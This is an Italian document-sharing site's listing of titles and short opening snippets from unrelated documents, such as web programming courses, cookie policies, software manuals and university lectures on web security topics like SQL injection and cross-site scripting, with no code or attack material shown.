Concetti base. Impianti Informatici. Web application Concetti base Web application La diffusione del World Wide Web 2 Supporto ai ricercatori Organizzazione documentazione Condivisione informazioni Scambio di informazioni di qualsiasi natura Chat Forum Intranet

Dettagli

2009. STR S.p.A. u.s. Tutti i diritti riservati

2009. STR S.p.A. u.s. Tutti i diritti riservati 2009. STR S.p.A. u.s. Tutti i diritti riservati Sommario COME INSTALLARE STR VISION CPM... 3 Concetti base dell installazione Azienda... 4 Avvio installazione... 4 Scelta del tipo Installazione... 5 INSTALLAZIONE

Dettagli

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection ---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------

Dettagli

Obiettivo dell esercitazione

Obiettivo dell esercitazione Database e Web - Esercitazioni ASP - Andrea Proli proliand@csr.unibo.it Laboratorio di Basi di Dati A.A. 2005/2006 Obiettivo dell esercitazione L obiettivo finale dell esercitazione è quello di creare

Dettagli

Obiettivi d esame PHP Developer Fundamentals on MySQL Environment

Obiettivi d esame PHP Developer Fundamentals on MySQL Environment Obiettivi d esame PHP Developer Fundamentals on MySQL Environment 1.0 Ambiente di sviluppo 1.1 Web server e database MySQL Comprendere la definizione dei processi che si occupano di fornire i servizi web

Dettagli

Tecnologie e Programmazione Web

Tecnologie e Programmazione Web Presentazione 1 Tecnologie e Programmazione Web Html, JavaScript e PHP RgLUG Ragusa Linux Users Group SOftware LIbero RAgusa http://www.solira.org - Nunzio Brugaletta (ennebi) - Reti 2 Scopi di una rete

Dettagli

Applicazioni delle reti. Dalla posta elettronica al telelavoro

Applicazioni delle reti. Dalla posta elettronica al telelavoro Applicazioni delle reti Dalla posta elettronica al telelavoro Servizi su Internet La presenza di una infrastruttura tecnologica che permette la comunicazione tra computer a distanze geografiche, ha fatto

Dettagli

COOKIES PRIVACY POLICY DI BANCA PROFILO

COOKIES PRIVACY POLICY DI BANCA PROFILO COOKIES PRIVACY POLICY DI BANCA PROFILO Indice e sommario del documento Premessa... 3 1. Cosa sono i Cookies... 4 2. Tipologie di Cookies... 4 3. Cookies di terze parti... 5 4. Privacy e Sicurezza sui

Dettagli

L unico campo che deve essere valorizzato, altrimenti non sarà possibile creare l album, è Nome. Per facilitare la consultazione e la ricerca è

L unico campo che deve essere valorizzato, altrimenti non sarà possibile creare l album, è Nome. Per facilitare la consultazione e la ricerca è 1. Accesso alle gallerie fotografiche di Modellismo Più La prima operazione da fare per poter fruire a pieno delle funzionalità offerte dalle Gallerie fotografiche di Modellismo Più è quella di efettuare

Dettagli

COOKIES PRIVACY POLICY. Il sito web di. Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova

COOKIES PRIVACY POLICY. Il sito web di. Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova COOKIES PRIVACY POLICY Il sito web di Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova Titolare, ex art. 28 d.lgs. 196/03, del trattamento dei Suoi dati personali La rimanda

Dettagli

Gestione degli accessi al sistema(autenticazione) e ai locali. Analisi del traffico di rete (Firewall, IDS/IPS)

Gestione degli accessi al sistema(autenticazione) e ai locali. Analisi del traffico di rete (Firewall, IDS/IPS) Contromisure Contromisure Gestione degli accessi al sistema(autenticazione) e ai locali Antivirus Analisi del traffico di rete (Firewall, IDS/IPS) Analisi utilizzo delle risorse di sistema, accessi (IDS/IPS)

Dettagli

SOMMARIO. 1 ISTRUZIONI DI BASE. 2 CONFIGURAZIONE. 7 STORICO. 9 EDITOR HTML. 10 GESTIONE ISCRIZIONI E CANCELLAZIONI. 11 GESTIONE MAILING LIST.

SOMMARIO. 1 ISTRUZIONI DI BASE. 2 CONFIGURAZIONE. 7 STORICO. 9 EDITOR HTML. 10 GESTIONE ISCRIZIONI E CANCELLAZIONI. 11 GESTIONE MAILING LIST. INDICE 1) SOMMARIO... 1 2) ISTRUZIONI DI BASE... 2 3) CONFIGURAZIONE... 7 4) STORICO... 9 5) EDITOR HTML... 10 6) GESTIONE ISCRIZIONI E CANCELLAZIONI... 11 7) GESTIONE MAILING LIST... 12 8) E-MAIL MARKETING...

Dettagli

Corso di Informatica Modulo T3 B1 Programmazione web

Corso di Informatica Modulo T3 B1 Programmazione web Corso di Informatica Modulo T3 B1 Programmazione web 1 Prerequisiti Architettura client/server Elementi del linguaggio HTML web server SQL server Concetti generali sulle basi di dati 2 1 Introduzione Lo

Dettagli

Manuale di Integrazione IdM-RAS

Manuale di Integrazione IdM-RAS IdM-RAS Data: 30/11/09 File: Manuale di integrazione IdM-RAS.doc Versione: Redazione: Sardegna IT IdM-RAS Sommario 1 Introduzione... 3 2 Architettura del sistema... 4 2.1 Service Provider... 4 2.2 Local

Dettagli

SSL: applicazioni telematiche SSL SSL SSL. E-commerce Trading on-line Internet banking... Secure Socket Layer

SSL: applicazioni telematiche SSL SSL SSL. E-commerce Trading on-line Internet banking... Secure Socket Layer : applicazioni telematiche Secure Socket Layer E-commerce Trading on-line Internet banking... Protocollo proposto dalla Netscape Communications Corporation Garantisce confidenzialità e affidabilità delle

Dettagli

Manuale utente Gestione Utenti Portale Albo

Manuale utente Gestione Utenti Portale Albo GUAW_ManualeUtente_GestioneUtentiPortaleAlboManualeUtente_GestioneUtentiPortaleAlbo.docx Ministero delle Infrastrutture e dei Trasporti DIPARTIMENTO PER I TRASPORTI, LA NAVIGAZIONE ED I SISTEMI INFORMATIVI

Dettagli

Single Sign On sul web

Single Sign On sul web Single Sign On sul web Abstract Un Sigle Sign On (SSO) è un sistema di autenticazione centralizzata che consente a un utente di fornire le proprie credenziali una sola volta e di accedere a molteplici

Dettagli

anthericacms Il sistema professionale per la gestione dei contenuti del tuo sito web Versione 2.0

anthericacms Il sistema professionale per la gestione dei contenuti del tuo sito web Versione 2.0 anthericacms Il sistema professionale per la gestione dei contenuti del tuo sito web Versione 2.0 Email: info@antherica.com Web: www.antherica.com Tel: +39 0522 436912 Fax: +39 0522 445638 Indice 1. Introduzione

Dettagli

GESTIONE DELLE CASELLE PEC IN DURC CLIENT (ver. 1.1)

GESTIONE DELLE CASELLE PEC IN DURC CLIENT (ver. 1.1) Pag. 1 GESTIONE DELLE CASELLE PEC IN DURC CLIENT (ver. 1.1) INTRODUZIONE DURC Client fornisce le funzionalità complete per gestire l attivazione delle caselle PEC alle Imprese, dalla richiesta di apertura

Dettagli

Le espressioni regolari.

Le espressioni regolari. Lezione 8 Le espressioni regolari. Le espressioni regolari. Corrispondenze e classi di caratteri. Le regular expressions (espressioni regolari) servono per descrivere dei modelli di stringa. E possibile

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

Eguestbook 3.0. Manuale per il gestore Della struttura ricettiva

Eguestbook 3.0. Manuale per il gestore Della struttura ricettiva Eguestbook 3.0 Manuale per il gestore Della struttura ricettiva Vers. 09-2014 DocLine Service Via Poggio al pino 68 56037 Peccioli (Pi) http://www.docsnet.it mail : staff@docsnet.it Eguestbook : http://www.eguestbook.it

Dettagli

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali CORSO EDA Informatica di base Sicurezza, protezione, aspetti legali Rischi informatici Le principali fonti di rischio di perdita/danneggiamento dati informatici sono: - rischi legati all ambiente: rappresentano

Dettagli

Progetto LiberA. Studente/Relatore: Antonio Zambito Matricola: 124/1032 CdL: Informatica (0124) Prof.: Raffaele Montella

Progetto LiberA. Studente/Relatore: Antonio Zambito Matricola: 124/1032 CdL: Informatica (0124) Prof.: Raffaele Montella Progetto LiberA L implementazione di un applicazione Web (PHP, CSS3, HTML5, MYSQL, JAVASCRIPT) per facilitare la gestione di un associazione culturale, contestualmente un associazione di danza. Nasce dalla

Dettagli

Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti

Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti Il 27 aprile 2012 Il team della società Doctor Web continua a esaminare la prima nella storia botnet di vasta scala creata

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

WHITE PAPER Per Sql-Injection si intendono comunemente tutti quegli attacchi ad un'applicazione, solitamente Web, in cui il programma esegue query su di un database SQL utilizzando variabili passate dall'utente

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2010/2011 Sicurezza delle applicazioni web: attacchi web Alessandro Reina, Aristide Fattori 12 Maggio

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: attacchi web Alessandro Reina Aristide Fattori

Dettagli

Notifica sul Copyright

Notifica sul Copyright Parallels Panel Notifica sul Copyright ISBN: N/A Parallels 660 SW 39 th Street Suite 205 Renton, Washington 98057 USA Telefono: +1 (425) 282 6400 Fax: +1 (425) 282 6444 Copyright 1999-2009, Parallels,

Dettagli

Progetto Istanze On Line

Progetto Istanze On Line 2011 Progetto Istanze On Line 22 luglio 2011 INDICE 1 INTRODUZIONE ALL USO DELLA GUIDA... 3 1.1 SIMBOLI USATI E DESCRIZIONI... 3 2 GESTIONE DELL UTENZA... 4 2.1 COS È E A CHI È RIVOLTO... 4 2.2 NORMATIVA

Dettagli

1.1 - Crittografia sulla infrastruttura trasmissiva tra le stazioni remote Rilheva il centro di telecontrollo

1.1 - Crittografia sulla infrastruttura trasmissiva tra le stazioni remote Rilheva il centro di telecontrollo SISTEMA DI TELECONTROLLO RILHEVA GPRS (CARATTERISTICHE DEL VETTORE GPRS E SICUREZZE ADOTTATE) Abstract: Sicurezza del Sistema di Telecontrollo Rilheva Xeo4 ha progettato e sviluppato il sistema di telecontrollo

Dettagli

Questo punto richiederebbe uno sviluppo molto articolato che però a mio avviso va al di là delle possibilità fornite al candidato dal tempo a disposizione. Mi limiterò quindi ad indicare dei criteri di

Dettagli

Come rappresentato nello schema precedente Onyx Systems Messaging Security Suite è una soluzione di spam e virus filtering sever side, quindi basata

Come rappresentato nello schema precedente Onyx Systems Messaging Security Suite è una soluzione di spam e virus filtering sever side, quindi basata COME FUNZIONA *Per attivare il servizio di spam e virus filtering è necessario modificare il record MX (mail exchange) del dominio del cliente in modo che tutti i messaggi indirizzati a casella@dominiocliente.it

Dettagli

Client - Server. Client Web: il BROWSER

Client - Server. Client Web: il BROWSER Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare

Dettagli

Web Programming Specifiche dei progetti

Web Programming Specifiche dei progetti Web Programming Specifiche dei progetti Paolo Milazzo Anno Accademico 2010/2011 Argomenti trattati nel corso Nel corso di Web Programming sono state descritti i seguenti linguaggi (e tecnologie): HTML

Dettagli

Introduzione all elaborazione di database nel Web

Introduzione all elaborazione di database nel Web Introduzione all elaborazione di database nel Web Prof.ssa M. Cesa 1 Concetti base del Web Il Web è formato da computer nella rete Internet connessi fra loro in una modalità particolare che consente un

Dettagli

GUIDA ALL USO DEL PANNELLO DI GESTIONE SITO WEB

GUIDA ALL USO DEL PANNELLO DI GESTIONE SITO WEB GUIDA ALL USO DEL PANNELLO DI GESTIONE SITO WEB Copyright 2014 Wolters Kluwer Italia Srl 1 Sommario 1 Come accedere al Pannello di gestione... 4 2 del Pannello di gestione del sito web... 5 3 delle sezioni...

Dettagli

Abbonamento alla consultazione delle Norme UNI MANUALE D USO. Ver. 1 Settembre 2014

Abbonamento alla consultazione delle Norme UNI MANUALE D USO. Ver. 1 Settembre 2014 MANUALE D USO Ver. 1 Settembre 2014 Pag. 1 di 40 Manuale d uso ver. 2.1 luglio 2014 UTENTE ABBONAMENTO Pag. 2 di 40 Manuale d uso ver. 2.1 luglio 2014 SPAZIO PERSONALE Dopo aver eseguito il login appare

Dettagli

Sicurezza delle Applicazioni Informatiche. Qualificazione dei prodotti di back office Linee Guida RER

Sicurezza delle Applicazioni Informatiche. Qualificazione dei prodotti di back office Linee Guida RER Sicurezza delle Applicazioni Informatiche Qualificazione dei prodotti di back office Linee Guida RER 1 Cliente Redatto da Verificato da Approvato da Regione Emilia-Romagna CCD CCD Nicola Cracchi Bianchi

Dettagli

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero Glossario Account (profilo o identità) insieme dei dati personali e dei contenuti caricati su un sito Internet o su un social network. Anti-spyware programma realizzato per prevenire e rilevare i programmi

Dettagli

Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso

Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso INDICE 1. INTRODUZIONE...3 2. MODALITÀ DI ACCESSO AL SERVIZIO...3 2.1 CONFIGURAZIONE PER ACCESSO WI-FI...3 3. UTILIZZO DEL SERVIZIO...4

Dettagli

Navigazione in modalità InPrivate Browsing

Navigazione in modalità InPrivate Browsing G. Pettarin ECDL Modulo 7: Internet 52 Se selezioni questa modalità di navigazione si apre una nuova finestra del browser, come quella nella figura sottostante. Navigazione in modalità InPrivate Browsing

Dettagli

2.5. L'indirizzo IP identifica il computer di origine, il numero di porta invece identifica il processo di origine.

2.5. L'indirizzo IP identifica il computer di origine, il numero di porta invece identifica il processo di origine. ESERCIZIARIO Risposte ai quesiti: 2.1 Non sono necessarie modifiche. Il nuovo protocollo utilizzerà i servizi forniti da uno dei protocolli di livello trasporto. 2.2 Il server deve essere sempre in esecuzione

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

SICUREZZA INFORMATICA SICUREZZA DEI DISPOSITIVI MOBILI

SICUREZZA INFORMATICA SICUREZZA DEI DISPOSITIVI MOBILI SICUREZZA INFORMATICA SICUREZZA DEI DISPOSITIVI MOBILI Consigli per la protezione dei dati personali Ver.1.0, 21 aprile 2015 2 Pagina lasciata intenzionalmente bianca I rischi per la sicurezza e la privacy

Dettagli

Corso di Informatica

Corso di Informatica Corso di Informatica CL3 - Biotecnologie Orientarsi nel Web Prof. Mauro Giacomini Dott. Josiane Tcheuko Informatica - 2006-2007 1 Obiettivi Internet e WWW Usare ed impostare il browser Navigare in internet

Dettagli

PROGETTI DISPONIBILI IL CORSO DI PROGETTO DI RETI E SISTEMI INFORMATICI

PROGETTI DISPONIBILI IL CORSO DI PROGETTO DI RETI E SISTEMI INFORMATICI PROGETTI DISPONIBILI IL CORSO DI PROGETTO DI RETI E SISTEMI INFORMATICI 1 Web Link Monitor... 2 2 Database Browser... 4 3 Network Monitor... 5 4 Ghost Site... 7 5 Copy Search... 9 6 Remote Audio Video

Dettagli

Sistemi informativi e Telemedicina Anno Accademico 2008-2009 Prof. Mauro Giacomini

Sistemi informativi e Telemedicina Anno Accademico 2008-2009 Prof. Mauro Giacomini Sistemi informativi e Telemedicina Anno Accademico 2008-2009 Prof. Mauro Giacomini Concetti di base Tre funzioni fondamentali: Autenticazione: riceve le credenziali, le verifica presso un autorità, se

Dettagli

Il Sito utilizza cookies tecnici e non di profilazione

Il Sito utilizza cookies tecnici e non di profilazione PRIVACY POLICY Informativa Privacy 1. INTRODUZIONE La presente Privacy Policy è relativa al sito www.aslnapoli2-formazione.eu. Le informazioni che l utente deciderà di condividere attraverso il Sito saranno

Dettagli

GUIDA ALL USO DELL AREA RISERVATA

GUIDA ALL USO DELL AREA RISERVATA GUA ALL USO DELL AREA RISERVATA Copyright 2012 Wolters Kluwer Italia Srl 1 Sommario 1 Come accedere all Area Riservata... 4 2 del Pannello di gestione del sito web... 5 3 delle sezioni... 8 3.1 - Gestione

Dettagli

Manuale d uso Gestionale di contabilità Ver. 1.0.8 [05/01/2015]

Manuale d uso Gestionale di contabilità Ver. 1.0.8 [05/01/2015] Manuale d uso Gestionale di contabilità Ver. 1.0.8 [05/01/2015] Realizzato e distribuito da Leggerasoft Sommario Introduzione... 3 Guida all installazione... 4 Fase login... 5 Menù principale... 6 Sezione

Dettagli

Struttura logica di un programma

Struttura logica di un programma Struttura logica di un programma Tutti i programmi per computer prevedono tre operazioni principali: l input di dati (cioè l inserimento delle informazioni da elaborare) il calcolo dei risultati cercati

Dettagli

Piazza Vinci, 78-00139 Roma Tel. +39 347.301.78.14 Fax +39 06.878.599.211 info@etabetaweb.it www.etabetaweb.it. manuale utente Versione 1.

Piazza Vinci, 78-00139 Roma Tel. +39 347.301.78.14 Fax +39 06.878.599.211 info@etabetaweb.it www.etabetaweb.it. manuale utente Versione 1. Piazza Vinci, 78-00139 Roma Tel. +39 347.301.78.14 Fax +39 06.878.599.211 info@etabetaweb.it www.etabetaweb.it OPENm@il manuale utente Versione 1.2 INDICE INDICE 2 1. INDIRIZZI PRINCIPALI 3 1. MENU PRINCIPALE

Dettagli

Il Protocollo HTTP e la programmazione di estensioni Web

Il Protocollo HTTP e la programmazione di estensioni Web Il Protocollo HTTP e la programmazione di estensioni Web 1 Il protocollo HTTP È il protocollo standard inizialmente ramite il quale i server Web rispondono alle richieste dei client (prevalentemente browser);

Dettagli

Rapporto Tecnico su installazione del dimostratore

Rapporto Tecnico su installazione del dimostratore Rapporto Tecnico su installazione del dimostratore Indice 1 Introduzione 2 2 Installazione 3 2.1 Requisiti.............................. 3 2.2 Installazione........................... 3 3 Inserimento e/o

Dettagli

Privacy Policy. Tipi di dati trattati. Profili

Privacy Policy. Tipi di dati trattati. Profili Privacy Policy Il presente documento ha lo scopo di descrivere le modalità di gestione dei punti di accesso web relativamente al trattamento dei dati personali degli utenti/visitatori che vi accedono previa

Dettagli

Guida alla compilazione del questionario elettronico

Guida alla compilazione del questionario elettronico Sommario 1. Il questionario elettronico... 1 1.1 Prerequisiti... 1 1.2 Accesso al questionario elettronico... 2 1.2.1 Procedura di primo accesso per i rispondenti... 3 1.2.2 Procedura di cambio/recupero

Dettagli

GUIDA ALL USO DELL AREA RISERVATA

GUIDA ALL USO DELL AREA RISERVATA GUA ALL USO DELL AREA RISERVATA Sommario PREMESSA... 2 1 Come accedere all Area Riservata... 3 2 del Pannello di gestione del sito web... 4 3 delle sezioni... 7 3.1 - Gestione Sito... 7 3.1.1 - AreaRiservata...

Dettagli

Il Livello delle Applicazioni

Il Livello delle Applicazioni Il Livello delle Applicazioni Il livello Applicazione Nello stack protocollare TCP/IP il livello Applicazione corrisponde agli ultimi tre livelli dello stack OSI. Il livello Applicazione supporta le applicazioni

Dettagli

Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1)

Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Elementi di Sicurezza e Privatezza Lezione 15 Web Security - Code Injection (1) Chiara Braghin chiara.braghin@unimi.it Le 2 maggiori vulnerabilità dei siti Web SQL Injection Il browser spedisce dell input

Dettagli

Funzionalità del portale gesgolf.it

Funzionalità del portale gesgolf.it Funzionalità del portale gesgolf.it Il portale gesgolf.it mette a disposizione alcuni servizi utili per il mondo del golf a giocatori, circoli golfistici ed hotel convenzionati. Accesso iniziale La home

Dettagli

Internet e posta elettronica. A cura di Massimiliano Buschi

Internet e posta elettronica. A cura di Massimiliano Buschi Internet e posta elettronica A cura di Massimiliano Buschi Concetti fondamentali Internet www Tcp/ip Browser Terminologia Esistono un sacco di termini con cui bisogna famigliarizzare http url Link Isp

Dettagli

Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall

Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall Internet: conoscerlo al meglio per usarlo meglio Primi passi con internet Browser Transazioni sicure Antivirus Firewall Cosa serve per collegarsi? Un PC Un modem (router) Cosa serve per navigare? Un abbonamento

Dettagli

Privacy Policy INTRODUZIONE GENERALE

Privacy Policy INTRODUZIONE GENERALE Privacy Policy INTRODUZIONE GENERALE La presente Policy ha lo scopo di descrivere le modalità di gestione di questo sito di proprietà di Consorzio dei Commercianti del Centro Commerciale di Padova, in

Dettagli

PHP e Structured Query Language

PHP e Structured Query Language Esercitazioni del corso di Tecnologie per la Comunicazione Aziendale PHP e Structured Query Language Marco Loregian loregian@disco.unimib.it www.siti.disco.unimib.it/didattica/tca2008 Interrogazioni (ripasso)

Dettagli

Cookie (1) - Componenti

Cookie (1) - Componenti Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Questa tipologia di cookie permette il corretto funzionamento di alcune sezioni del Sito. Sono di due categorie: persistenti e di sessione:

Questa tipologia di cookie permette il corretto funzionamento di alcune sezioni del Sito. Sono di due categorie: persistenti e di sessione: Informativa estesa sui Cookie Cosa sono i cookies? In informatica i cookie HTTP (più comunemente denominati Web cookie, tracking cookie o semplicemente cookie) sono righe di testo usate per eseguire autenticazioni

Dettagli

Una minaccia dovuta all uso dell SNMP su WLAN

Una minaccia dovuta all uso dell SNMP su WLAN Una minaccia dovuta all uso dell SNMP su WLAN Gianluigi Me, gianluigi@wi-fiforum.com Traduzione a cura di Paolo Spagnoletti Introduzione Gli attacchi al protocollo WEP compromettono la confidenzialità

Dettagli